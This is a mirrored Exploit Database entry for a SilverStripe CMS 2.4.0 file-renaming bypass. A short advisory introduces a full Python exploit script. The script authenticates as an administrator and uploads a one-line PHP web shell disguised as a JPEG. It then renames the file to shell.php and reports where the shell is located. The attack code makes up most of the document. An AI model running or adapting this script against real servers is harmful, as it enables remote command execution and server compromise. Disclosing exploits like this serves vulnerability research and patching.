SilverStripe CMS 2.4 – File Renaming Security Bypass

Exploit Database
112 阅读

作者： John Leitch

日期： 2010-06-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34113/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

source: https://www.securityfocus.com/bid/40679/info

SilverStripe CMS is prone to a security-bypass vulnerability.

An attacker can exploit this vulnerability to rename uploaded files on the affected webserver. Successful exploits may allow attackers to execute arbitrary code within the context of the affected webserver.

SilverStripe CMS 2.4.0 is vulnerable; other versions may also be affected.

import sys, socket, re

host = 'www.example.com'

path = '/silverstripe'

username = 'admin'

password = 'Password1'

port = 80

def send_request(request):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host, port))

s.settimeout(8)

s.send(request)

resp = ''

while 1:

r = s.recv(8192)

if not r: break

resp += r

if r[:15] == 'HTTP/1.1 302 OK': break

s.close()

return resp

def upload_shell():

print 'authenticating'

content = 'AuthenticationMethod=MemberAuthenticator&Email=' + username + '&Password='+ password + '&action_dologin=Log+in'

header = 'POST http://' + host + path + '/Security/LoginForm HTTP/1.1\r\n'\

'Host: ' + host + '\r\n'\

'Connection: keep-alive\r\n'\

'User-Agent: x\r\n'\

'Content-Length: ' + str(len(content)) + '\r\n'\

'Cache-Control: max-age=0\r\n'\

'Origin: http://' + host + '\r\n'\

'Content-Type: application/x-www-form-urlencoded\r\n'\

'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\

'Accept-Encoding: gzip,deflate,sdch\r\n'\

'Accept-Language: en-US,en;q=0.8\r\n'\

'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\

'\r\n'

resp = send_request(header + content)

print 'uploading shell'

match = re.findall(u'Set-Cookie:\s([^\r\n]+)', resp)

for m in match:

if m[:9] == 'PHPSESSID':

cookie = m

content = '------x\r\n'\

'Content-Disposition: form-data; name="ID"\r\n'\

'\r\n'\

'0\r\n'\

'------x\r\n'\

'Content-Disposition: form-data; name="FolderID"\r\n'\

'\r\n'\

'0\r\n'\

'------x\r\n'\

'Content-Disposition: form-data; name="action_doUpload"\r\n'\

'\r\n'\

'1\r\n'\

'------x\r\n'\

'Content-Disposition: form-data; name="Files[1]"; filename=""\r\n'\

'\r\n'\

'------x\r\n'\

'Content-Disposition: form-data; name="Files[0]"; filename="shell.jpg"\r\n'\

'Content-Type: image/jpeg\r\n'\

'\r\n'\

'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\

'------x\r\n'\

'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n'\

'\r\n'\

'------x\r\n'\

'Content-Disposition: form-data; name="action_upload"\r\n'\

'\r\n'\

'Upload Files Listed Below\r\n'\

'------x--\r\n'\

header = 'POST http://' + host + path + '/admin/assets/UploadForm HTTP/1.1\r\n'\

'Host: ' + host + '\r\n'\

'Proxy-Connection: keep-alive\r\n'\

'User-Agent: x\r\n'\

'Content-Length: ' + str(len(content)) + '\r\n'\

'Cache-Control: max-age=0\r\n'\

'Origin: http://' + host + '\r\n'\

'Content-Type: multipart/form-data; boundary=----x\r\n'\

'Accept: text/html\r\n'\

'Accept-Encoding: gzip,deflate,sdch\r\n'\

'Accept-Language: en-US,en;q=0.8\r\n'\

'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\

'Cookie: ' + cookie + '\r\n'\

'\r\n'

resp = send_request(header + content)

print 'grabbing ids'

file_id = re.search(u'/\*\sIDs:\s(\d+)\s\*/', resp).group(1)

file_name = re.search(u'/\*\sNames:\s([^\*]+)\s\*/', resp).group(1)

resp = send_request('GET http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1 HTTP/1.1\r\n'\

'Host: ' + host + '\r\n'\

'Cookie: ' + cookie + '\r\n\r\n')

print 'renaming shell'

security_id = re.search(u'name="SecurityID" value="(\d+)"', resp).group(1)

owner_id = re.search(u'option selected="selected" value="(\d+)"', resp).group(1)

content = 'Title=' + file_name + '&Name=shell.php&FileType=JPEG+image+-+good+for+photos&Size=56+bytes&OwnerID=' + owner_id + '&Dimensions=x&ctf%5BchildID%5D=' + file_id + '&ctf%5BClassName%5D=File&SecurityID=' + security_id + '&action_saveComplexTableField=Save'

header = 'POST http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/DetailForm HTTP/1.1\r\n'\

'Host: ' + host + '\r\n'\

'Proxy-Connection: keep-alive\r\n'\

'User-Agent: x\r\n'\

'Referer: http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1\r\n'\

'Content-Length: ' + str(len(content)) + '\r\n'\

'Cache-Control: max-age=0\r\n'\

'Origin: http://' + host + '\r\n'\

'Content-Type: application/x-www-form-urlencoded\r\n'\

'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\

'Accept-Encoding: gzip,deflate,sdch\r\n'\

'Accept-Language: en-US,en;q=0.8\r\n'\

'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\

'Cookie: ' + cookie + '; PastMember=1\r\n'\

'\r\n'

resp = send_request(header + content)

print 'shell located at http://' + host + path + '/assets/shell.php'

upload_shell()